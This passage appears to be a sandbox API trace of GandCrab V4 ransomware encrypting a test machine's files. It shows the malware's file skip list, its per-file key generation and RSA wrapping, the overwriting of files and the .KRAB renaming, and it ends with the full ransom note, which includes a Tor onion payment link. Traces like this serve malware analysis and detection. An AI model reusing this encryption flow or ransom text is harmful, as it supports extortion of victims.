param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL.KRAB") returned 82 [0058.973] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL") returned 77 [0058.973] lstrlenW (lpString=".XSL") returned 4 [0058.973] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0058.973] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".XSL ") returned 5 [0058.973] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.974] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL") returned 77 [0058.974] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL") returned 77 [0058.974] lstrcmpiW (lpString1="SIST02.XSL", lpString2="desktop.ini") returned 1 [0058.974] lstrcmpiW (lpString1="SIST02.XSL", lpString2="autorun.inf") returned 1 [0058.974] lstrcmpiW (lpString1="SIST02.XSL", lpString2="ntuser.dat") returned 1 [0058.974] lstrcmpiW (lpString1="SIST02.XSL", lpString2="iconcache.db") returned 1 [0058.974] lstrcmpiW (lpString1="SIST02.XSL", lpString2="bootsect.bak") returned 1 [0058.974] lstrcmpiW (lpString1="SIST02.XSL", lpString2="boot.ini") returned 1 [0058.974] lstrcmpiW (lpString1="SIST02.XSL", lpString2="ntuser.dat.log") returned 1 [0058.974] lstrcmpiW (lpString1="SIST02.XSL", lpString2="thumbs.db") returned -1 [0058.974] lstrcmpiW (lpString1="SIST02.XSL", lpString2="KRAB-DECRYPT.html") returned 1 [0058.974] lstrcmpiW (lpString1="SIST02.XSL", lpString2="KRAB-DECRYPT.txt") returned 1 [0058.974] lstrcmpiW (lpString1="SIST02.XSL", lpString2="CRAB-DECRYPT.txt") returned 1 [0058.974] lstrcmpiW (lpString1="SIST02.XSL", lpString2="ntldr") returned 1 [0058.974] lstrcmpiW (lpString1="SIST02.XSL", lpString2="NTDETECT.COM") returned 1 [0058.974] lstrcmpiW (lpString1="SIST02.XSL", lpString2="Bootfont.bin") returned 1 [0058.974] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0058.975] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbc210) returned 1 [0058.975] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0058.976] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0058.976] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0058.976] CryptGenRandom (in: hProv=0xfbc210, dwLen=0x20, pbBuffer=0x338e7cc | out: pbBuffer=0x338e7cc) returned 1 [0058.976] CryptReleaseContext (hProv=0xfbc210, dwFlags=0x0) returned 1 [0058.976] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.976] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbb3b8) returned 1 [0058.977] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0058.977] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0058.977] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0058.977] CryptGenRandom (in: hProv=0xfbb3b8, dwLen=0x8, pbBuffer=0x338e7ec | out: pbBuffer=0x338e7ec) returned 1 [0058.977] CryptReleaseContext (hProv=0xfbb3b8, dwFlags=0x0) returned 1 [0058.977] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.978] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbb2a8) returned 1 [0058.978] CryptImportKey (in: hProv=0xfbb2a8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd960) returned 1 [0058.978] CryptGetKeyParam (in: hKey=0xfbd960, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0058.978] CryptEncrypt (in: hKey=0xfbd960, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e75c*=0x100) returned 1 [0058.978] GetLastError () returned 0x0 [0058.979] CryptDestroyKey (hKey=0xfbd960) returned 1 [0058.979] CryptReleaseContext (hProv=0xfbb2a8, dwFlags=0x0) returned 1 [0058.979] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbbb28) returned 1 [0058.979] CryptImportKey (in: hProv=0xfbbb28, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd460) returned 1 [0058.979] CryptGetKeyParam (in: hKey=0xfbd460, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0058.979] CryptEncrypt (in: hKey=0xfbd460, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e75c*=0x100) returned 1 [0058.980] GetLastError () returned 0x0 [0058.980] CryptDestroyKey (hKey=0xfbd460) returned 1 [0058.980] CryptReleaseContext (hProv=0xfbbb28, dwFlags=0x0) returned 1 [0058.980] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\sist02.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0058.980] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0058.981] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0058.981] ReadFile (in: hFile=0x448, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e7fc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338e7fc*=0x3d5c8, lpOverlapped=0x0) returned 1 [0059.022] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0xfffc2a38, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.022] WriteFile (in: hFile=0x448, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x3d5c8, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338e7f8*=0x3d5c8, lpOverlapped=0x0) returned 1 [0059.023] WriteFile (in: hFile=0x448, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338e7f8*=0x208, lpOverlapped=0x0) returned 1 [0059.023] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.027] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.028] CloseHandle (hObject=0x448) returned 1 [0059.032] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.033] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\sist02.xsl"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\sist02.xsl.krab")) returned 1 [0059.034] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.034] FindNextFileW (in: hFindFile=0xfbd8a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0059.034] lstrcmpW (lpString1="TURABIAN.XSL", lpString2=".") returned 1 [0059.034] lstrcmpW (lpString1="TURABIAN.XSL", lpString2="..") returned 1 [0059.034] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\", lpString2="TURABIAN.XSL" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL" [0059.034] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.034] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL.KRAB") returned 84 [0059.034] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL") returned 79 [0059.034] lstrlenW (lpString=".XSL") returned 4 [0059.035] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.035] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".XSL ") returned 5 [0059.039] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.039] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL") returned 79 [0059.039] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL") returned 79 [0059.039] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="desktop.ini") returned 1 [0059.039] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="autorun.inf") returned 1 [0059.039] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="ntuser.dat") returned 1 [0059.039] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="iconcache.db") returned 1 [0059.039] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="bootsect.bak") returned 1 [0059.039] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="boot.ini") returned 1 [0059.039] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="ntuser.dat.log") returned 1 [0059.039] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="thumbs.db") returned 1 [0059.040] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="KRAB-DECRYPT.html") returned 1 [0059.040] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="KRAB-DECRYPT.txt") returned 1 [0059.040] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="CRAB-DECRYPT.txt") returned 1 [0059.040] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="ntldr") returned 1 [0059.040] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="NTDETECT.COM") returned 1 [0059.040] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="Bootfont.bin") returned 1 [0059.040] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.040] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbb880) returned 1 [0059.041] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0059.041] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0059.041] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0059.041] CryptGenRandom (in: hProv=0xfbb880, dwLen=0x20, pbBuffer=0x338e7cc | out: pbBuffer=0x338e7cc) returned 1 [0059.041] CryptReleaseContext (hProv=0xfbb880, dwFlags=0x0) returned 1 [0059.041] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.042] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbc210) returned 1 [0059.042] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0059.043] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0059.043] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0059.043] CryptGenRandom (in: hProv=0xfbc210, dwLen=0x8, pbBuffer=0x338e7ec | out: pbBuffer=0x338e7ec) returned 1 [0059.043] CryptReleaseContext (hProv=0xfbc210, dwFlags=0x0) returned 1 [0059.043] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.043] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbb990) returned 1 [0059.044] CryptImportKey (in: hProv=0xfbb990, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd960) returned 1 [0059.044] CryptGetKeyParam (in: hKey=0xfbd960, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0059.044] CryptEncrypt (in: hKey=0xfbd960, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e75c*=0x100) returned 1 [0059.044] GetLastError () returned 0x0 [0059.044] CryptDestroyKey (hKey=0xfbd960) returned 1 [0059.044] CryptReleaseContext (hProv=0xfbb990, dwFlags=0x0) returned 1 [0059.044] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbb198) returned 1 [0059.045] CryptImportKey (in: hProv=0xfbb198, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd720) returned 1 [0059.045] CryptGetKeyParam (in: hKey=0xfbd720, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0059.045] CryptEncrypt (in: hKey=0xfbd720, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e75c*=0x100) returned 1 [0059.045] GetLastError () returned 0x0 [0059.045] CryptDestroyKey (hKey=0xfbd720) returned 1 [0059.045] CryptReleaseContext (hProv=0xfbb198, dwFlags=0x0) returned 1 [0059.045] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\turabian.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0059.053] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0059.054] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0059.054] ReadFile (in: hFile=0x448, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e7fc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338e7fc*=0x54256, lpOverlapped=0x0) returned 1 [0059.093] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0xfffabdaa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.093] WriteFile (in: hFile=0x448, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x54256, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338e7f8*=0x54256, lpOverlapped=0x0) returned 1 [0059.094] WriteFile (in: hFile=0x448, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338e7f8*=0x208, lpOverlapped=0x0) returned 1 [0059.094] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.098] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.100] CloseHandle (hObject=0x448) returned 1 [0059.106] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.107] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\turabian.xsl"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\turabian.xsl.krab")) returned 1 [0059.107] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.108] FindNextFileW (in: hFindFile=0xfbd8a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0 [0059.108] FindClose (in: hFindFile=0xfbd8a0 | out: hFindFile=0xfbd8a0) returned 1 [0059.108] CloseHandle (hObject=0x440) returned 1 [0059.108] FindNextFileW (in: hFindFile=0xfbd420, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0059.108] FindClose (in: hFindFile=0xfbd420 | out: hFindFile=0xfbd420) returned 1 [0059.108] CloseHandle (hObject=0x3ac) returned 1 [0059.109] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0059.109] lstrcmpW (lpString1="Credentials", lpString2=".") returned 1 [0059.109] lstrcmpW (lpString1="Credentials", lpString2="..") returned 1 [0059.109] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="Credentials" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials" [0059.109] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\" [0059.109] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0059.109] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0059.109] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0059.109] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0059.109] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0059.110] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.110] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.110] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\\\KRAB-DECRYPT.txt") returned 77 [0059.110] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\credentials\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0059.111] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0059.111] WriteFile (in: hFile=0x3ac, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0059.112] 